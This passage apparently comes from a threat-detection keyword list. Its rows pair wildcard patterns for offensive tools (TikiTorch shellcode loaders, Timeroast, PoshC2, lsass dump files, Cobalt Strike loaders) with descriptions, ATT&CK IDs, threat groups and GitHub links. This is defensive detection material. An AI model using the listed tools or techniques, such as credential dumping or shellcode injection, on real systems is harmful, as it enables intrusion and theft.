Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*TikiLoader.Injector*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiLoader\TikiLoader*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawn.dll*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawn.exe*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawn.ps1*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnAs*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnAsAdmin*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnElevated*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnWOppid*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiSpawnWppid*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiTorch.exe*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiVader.*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*timemachine_cmd_injection*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*timeroast.ps1*,offensive_tool_keyword,Timeroast,Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID,T1558.003 - T1059.003 - T1078.004,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/SecuraBV/Timeroast,1,1,N/A,10,2,152,16,2023-07-04T07:12:57Z,2023-01-18T09:04:05Z -*timeroast.py*,offensive_tool_keyword,Timeroast,Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID,T1558.003 - T1059.003 - T1078.004,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/SecuraBV/Timeroast,1,1,N/A,10,2,152,16,2023-07-04T07:12:57Z,2023-01-18T09:04:05Z -*timestomp c:*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - 
HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*timing_attack * --brute-force*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*timwhitez/Doge-Loader*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential 
Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,ntlm decoder,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,0,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*tls-scanner -connect *:*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*tmdb-get-company-names *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*tmp*ciscophones.tgz*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*tmp*lsass_*.dmp*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket 
with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Tmprovider.dll*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 